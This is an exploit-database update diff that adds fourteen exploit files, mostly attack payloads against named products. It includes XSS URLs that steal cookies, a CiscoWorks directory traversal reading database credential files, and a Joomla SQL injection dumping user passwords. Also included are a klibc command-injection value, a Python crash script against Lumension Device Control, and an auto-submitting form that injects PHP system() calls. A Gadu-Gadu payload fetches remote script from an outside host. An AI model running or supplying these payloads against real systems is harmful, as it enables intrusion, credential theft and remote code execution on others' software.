Update: 2015-01-17

14 new exploits

files.csv

@@ -32230,3 +32230,17 @@ id,file,description,date,author,platform,type,port
 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,metasploit,java,remote,9788
 35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows FILE Privilege Abuse",2015-01-13,metasploit,windows,remote,0
 35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 Shell Upload",2015-01-13,metasploit,php,remote,80
+35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework <= 3.1.1 Help Servlet Cross Site Scripting Vulnerability",2011-05-18,"Sense of Security",hardware,remote,0
+35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager <= 8.5 Common Services Device Center Cross Site Scripting Vulnerability",2011-05-18,"Sense of Security",hardware,remote,0
+35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services <= 3.1.1 Auditing Directory Traversal Vulnerability",2011-05-18,"Sense of Security",java,webapps,0
+35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 'display.php' Cross Site Scripting Vulnerability",2011-05-19,"AutoSec Tools",php,webapps,0
+35783,platforms/php/webapps/35783.html,"Andy's PHP Knowledgebase 0.95.4 'step5.php' Remote PHP Code Execution Vulnerability",2011-05-19,"AutoSec Tools",php,webapps,0
+35784,platforms/linux/remote/35784.php,"Zend Framework <= 1.11.4 'PDO_MySql' Security Bypass Vulnerability",2011-05-19,"Anthony Ferrara",linux,remote,0
+35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 DHCP Options Processing Remote Shell Command Execution Vulnerability",2011-05-18,"maximilian attems",linux,remote,0
+35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80
+35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ 'admin.php' Cross Site Scripting Vulnerability",2011-05-19,"Juan Manuel Garcia",php,webapps,0
+35788,platforms/php/webapps/35788.txt,"Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection Vulnerability",2011-05-23,FL0RiX,php,webapps,0
+35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 Multiple Cross Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0
+35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x Memory Corruption Vulnerability",2011-05-24,"Andy Davis",multiple,remote,0
+35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 'ajax-chat.php' Cross Site Scripting Vulnerability",2011-05-24,"High-Tech Bridge SA",php,webapps,0
+35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting Vulnerability",2011-05-24,"Kacper Szczesniak",multiple,remote,0

platforms/hardware/remote/35779.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47902/info
+
+CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and launch other attacks.
+
+This issue is being monitored by Cisco Bug ID CSCto12704.
+
+CiscoWorks Common Services 3.3 and prior are vulnerable. 
+
+http://www.example.com/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1

platforms/hardware/remote/35780.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47903/info
+
+Cisco Unified Operations Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue is being tracked by Cisco Bug ID CSCto12712.
+
+Cisco Unified Operations Manager versions prior to 8.6 are vulnerable. 
+
+http://www.example.com/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)

platforms/java/webapps/35781.txt

@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/47905/info
+
+CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.
+
+This issue is being monitored by Cisco Bug ID CSCto35577.
+
+CiscoWorks Common Services 3.3 and prior are vulnerable.
+
+http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
+cmfDBA user database info:
+
+http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
+Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties DB connection info for all databases:
+
+http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
+Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties
+
+Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.
+DB password change log:
+
+http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
+Files\CSCOpx\log\dbpwdChange.log

platforms/linux/remote/35784.php

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/47919/info
+
+Zend Framework is prone to a security-bypass vulnerability.
+
+An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.
+
+Zend Framework versions prior to 1.10.9 and 1.11.6 are vulnerable. 
+
+$dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK';
+$pdo = new PDO($dsn, $user, $pass);
+$pdo->exec('SET NAMES GBK');
+$string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*';
+$sql = "SELECT TABLE_NAME 
+            FROM INFORMATION_SCHEMA.TABLES 
+            WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
+$stmt = $pdo->query($sql);
+var_dump($stmt->rowCount());
+

platforms/linux/remote/35785.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47924/info
+
+klibc is prone to a shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary shell commands in the context of the application that uses the vulnerable library.
+
+Versions prior to klibc 1.5.22 are vulnerable.
+
+DNSDOMAIN="\\\"\$(echo owned; touch /tmp/owned)" 

platforms/multiple/remote/35790.py

@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/47952/info
+
+Lumension Security Lumension Device Control (formerly Sanctuary) is prone to a memory-corruption vulnerability.
+
+An attacker can exploit this issue to cause a denial-of-service condition. Due to the nature of this issue, remote code execution is possible but has not been confirmed.
+
+Lumension Device Control 4.4 SR6 is vulnerable; other versions may also be affected. 
+
+#!/usr/local/bin/python
+
+import sys
+from socket import *
+import os
+
+if (len(sys.argv)!=2):
+	print "\n--------------------------------------------------"
+	print "Usage: %s <target IP>" % sys.argv[0]
+	print "--------------------------------------------------\n"
+	exit(0)
+
+host=sys.argv[1]
+port=65129
+
+packet1 =  "\xec\x02\x00\x00"	#length of remaining packet
+packet1 += "\xc9\x00\x00\x00"	#some kind of packet ID?
+#packet1 += "\x18\x00\x00\x00"
+packet1 += "\x61\x61\x61\x61"	#crash occurs here
+
+packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
+packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
+packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
+packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
+packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
+packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version
+packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
+packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
+packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
+packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
+packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
+packet1 += "\xc0\xa8\x00\x6b" #client IP address
+packet1 += "\xff\xff\xff\x00" #client subnet mask
+packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
+packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname
+packet1 += "\x00" * 480
+packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
+packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
+packet1 += "\x00\x00\x00\x00\x00\x00"
+
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((host, port))
+s.send(packet1)
+print s.recv(1024)
+s.close()
+

platforms/multiple/remote/35792.txt

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/47957/info
+
+Gadu-Gadu Instant Messenger is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+file name that loads external x.js code:
+<input
+onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);"
+autofocus>
+
+example x.js code to hide, accept and open every file request:
+
+document.getElementById('extra').innerHTML = '<style>.file,
+.entrySeparator{display:none;}</style>';
+n = document.getElementById('open_file');
+n.setAttribute('id', '');
+
+function ff(){
+    if(f = document.getElementById('open_file')) {
+        e = document.createEvent("HTMLEvents");
+        e.initEvent('click', true, true);
+        f.dispatchEvent(e);
+        f.setAttribute('id', '');
+    }
+    setTimeout('ff()', 1000);
+}
+
+ff();

platforms/multiple/webapps/35786.txt

@@ -0,0 +1,190 @@
+SEC Consult Vulnerability Lab Security Advisory < 20150113-1 >
+=======================================================================
+              title: Privilege Escalation & XSS & Missing Authentication
+            product: Ansible Tower
+ vulnerable version: <=2.0.2
+      fixed version: >=2.0.5
+             impact: high
+           homepage: http://www.ansible.com/tower
+              found: 2014-10-15
+                 by: Manuel Hofer
+                     SEC Consult Vulnerability Lab
+                     https://www.sec-consult.com
+=======================================================================
+
+Vendor description:
+-------------------
+"Ansible Tower is the easy-to-use UI and dashboard and REST API for Ansible.
+Centralize your Ansible infrastructure from a modern UI, featuring role-based
+access control, job scheduling, and graphical inventory management. Tower's
+REST API and CLI make it easy to embed Tower into existing tools and processes.
+Tower now includes real-time output of playbook runs, an all-new dashboard and
+expanded out-of-the-box cloud support."
+
+source: http://www.ansible.com/tower
+
+
+Business recommendation:
+------------------------
+Attackers are able to elevate privileges and gain full control over Ansible
+Tower and therefore access to sensitive data of other customers.
+
+It is assumed that further vulnerabilities exist as only a short crash test has
+been performed. Therefore it is recommended to perform a thorough security
+review by security professionals.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Privilege Escalation
+Ansible Tower provides the feature to create multiple organizations inside
+one tower instance. Each organization can have an unlimited number of users
+and administrators which are only allowed to perform actions in the context
+of their own organization. Due to missing validation of the "is_superuser"
+parameter during user creation, organization admins can create superadmin
+accounts and therefore elevate their privileges to gain full control of
+Ansible Tower.
+
+
+2) Reflected Cross-Site Scripting
+Several parts of the Ansible Tower API have been identified to be vulnerable
+against reflected XSS attacks which can be used by an attacker to steal user
+sessions.
+
+
+3) Missing Websocket Authentication / Information Leakage
+The Ansible Tower UI uses Websockets to notify clients about recent events.
+This part of the application lacks authentication as well as authorization,
+leading to internal data about e.g. scheduled events, being leaked to
+unauthorized and/or unauthenticated users.
+
+
+Proof of concept:
+-----------------
+1) Privilege Escalation (Org-Admin to Superadmin)
+Using the following request, a user with administrative privileges limited to an
+organization, can create a superadmin account with access to all organizations:
+
+> POST /api/v1/organizations/3/users/ HTTP/1.1
+> Host: $host
+> Authorization: Token c3f03841403a17ed79753e057167a62144dae7df
+> X-Auth-Token: Token c3f03841403a17ed79753e057167a62144dae7df
+>
+> {"first_name":"Org1admin_superuser","last_name":"Org1admin_superuser",
+> "email":"Org1admin_superuser@local.local","organization":3,
+> "username":"Org1admin_superuser","password":"Org1admin_superuser",
+> "password_confirm":"Org1admin_superuser","is_superuser":"true","ldap_user":""}
+
+
+2) Reflected Cross-Site Scripting
+The following URL parameters have been identified to be vulnerable against
+reflected cross-site scripting:
+ * URL: /api/v1/credentials/, Parameter: order_by
+ * URL: /api/v1/inventories/, Parameter: order_by
+ * URL: /api/v1/projects/, Parameter: order_by
+ * URL: /api/v1/schedules/, Parameter: next_run
+ * URL: /api/v1/users/3/permissions/, Parameter: order_by
+
+It is likely that similar issues exist in other parts of the application.
+
+
+3) Missing Websocket Authentication / Information Leakage
+An attacker can setup a websocket connection without providing any credentials
+as follows. By issuing a GET request to "https://tower:8080/socket.io/1/" the
+server responds with the following string:
+> 43167469538:60:60:websocket,xhr-multipart,htmlfilonp-polling[...]
+
+The first integer value can further be used to establish a websocket connection:
+#~% openssl s_client -verify 0 -connect tower:8080
+> GET /socket.io/1/websocket/43167469538 HTTP/1.1
+> Host: tower:8080
+> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+> Accept-Language: en-US,en;q=0.5
+> Accept-Encoding: gzip, deflate
+> Sec-WebSocket-Version: 13
+> Origin: https://tower
+> Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
+> Connection: keep-alive, Upgrade
+> Pragma: no-cache
+> Cache-Control: no-cache
+> Upgrade: websocket
+>
+>
+
+The websocket key seen above, has been taken from the examples of the wikipedia
+page on WebSockets (http://de.wikipedia.org/wiki/WebSocket) as it is only used
+to verify that the server received and understood the message.
+
+The server responds as follows:
+< HTTP/1.1 101 Switching Protocols
+< Upgrade: websocket
+< Connection: Upgrade
+< Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
+
+Now that the websocket connection has been established, data that would
+otherwise be presented to logged in users to display status updates for "job
+related events" inside tower, can now be observed without any authentication.
+Following an example of data received through the websocket connection.
+> 5::/socket.io/jobs:{"args":{"status":"pending","project_id":56,
+> "unified_job_id":61,"event":"status_changed","endpoint":"/socket.io/jobs"},
+> "name":"status_changed"}
+
+Even tough no critical information has been identified leaking through the
+websocket, this should still be protected with proper authentication and
+authorization because it might aid an attacker in conducting further attacks.
+
+
+Vulnerable / tested versions:
+-----------------------------
+Ansible Tower version v2.0.2 has been tested which was the most recent version
+at the time of discovery.
+
+
+Vendor contact timeline:
+------------------------
+2014-10-22: Contacting vendor through security@ansible.com and asking for
+            cryptographic material in order to securely send advisory.
+2014-10-22: Sending unencrypted advisory as requested by vendor.
+2014-10-22: Vendor suggests to release a fix prior to 12.12.2014
+2014-10-28: Vendor confirms reported vulnerabilities
+2014-12-10: Vendor releases fixed Version 2.0.5
+2015-01-13: SEC Consult releases security advisory
+
+
+Solution:
+---------
+Upgrade to a fixed version of Ansible Tower >= 2.0.5
+
+
+Workaround:
+-----------
+For vulnerabilities 1 to 2, no workaround can be applied.
+3 can be circumvented by blocking access to TCP port 8080 on your
+Ansible Tower installation.
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
+
+Headquarter:
+Mooslackengasse 17, 1190 Vienna, Austria
+Phone:   +43 1 8903043 0
+Fax:     +43 1 8903043 15
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+Interested to work with the experts of SEC Consult?
+Write to career@sec-consult.com
+
+EOF Manuel Hofer / 2015

platforms/php/webapps/35782.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47914/info
+
+Room Juice is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Room Juice 0.3.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/roomjuice-0.3.3/display.php?filename=%3Cscript%3Ealert%280%29%3C/script%3E 

platforms/php/webapps/35783.html

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/47918/info
+
+Andy's PHP Knowledgebase is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
+
+Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
+
+Andy's PHP Knowledgebase 0.95.4 is vulnerable; other versions may also be affected. 
+
+<html>
+    <body onload="document.forms[0].submit()"> 
+        <form method="POST" action="http://localhost/aphpkb/install/step5.php">  
+            <input type="hidden" name="install_dbuser" value="');system('calc');//" />   
+            <input type="submit" name="submit" />   
+        </form>   
+    </body>
+</html>

platforms/php/webapps/35787.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/47931/info
+
+LimeSurvey is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+LimeSurvey 1.85+ is vulnerable; other versions may also be affected.
+
+POST /admin/admin.php HTTP/1.1
+Content-Length: 110
+Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif,
+image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.mspowerpoint,
+application/msword, application/x-shockwave-flash, */*
+Referer: http://xxx.xxx.xxx.xxx/admin/admin.php
+Accept-Language: es-AR
+Content-Type: application/x-www-form-urlencoded
+Host: xxx.xxx.xxx.xxx
+Pragma: no-cache
+Connection: Keep-Alive
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+user=admin&password=test&loginlang=default&action=login&refererargs="/><script
+>alert(document.cookie)</script>

platforms/php/webapps/35788.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/47941/info
+
+The 'com_maplocator' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_maplocator&view=state&cid= null+AND+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

platforms/php/webapps/35789.txt

@@ -0,0 +1,14 @@
+source:  http://www.securityfocus.com/bid/47951/info
+
+phpScheduleIt is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+phpScheduleIt 1.2.12 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/forgot_pwd.php/[xss]
+http://www.example.com/index.php/[xss]
+http://www.example.com/register.php/[xss]
+http://www.example.com/roschedule.php/[xss]
+http://www.example.com/popCalendar.php?scheduleid=[xss] 
+

platforms/php/webapps/35791.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47953/info
+
+Ajax Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Ajax Chat 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/ajax-chat/ajax-chat.php?chat_path=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 

platforms/windows/remote/34668.txt

@@ -23,4 +23,5 @@ http://localhost:80/?search=%00{.exec|cmd.}
 will stop regex from parse macro , and macro will be executed and remote code injection happen.
 
 
-## EDB Note: This vulnerability will run the payload multiple times simultaneously. Make sure to take this into consideration when crafting your payload (and/or listener).
+## EDB Note: This vulnerability will run the payload multiple times simultaneously. 
+##   Make sure to take this into consideration when crafting your payload (and/or listener).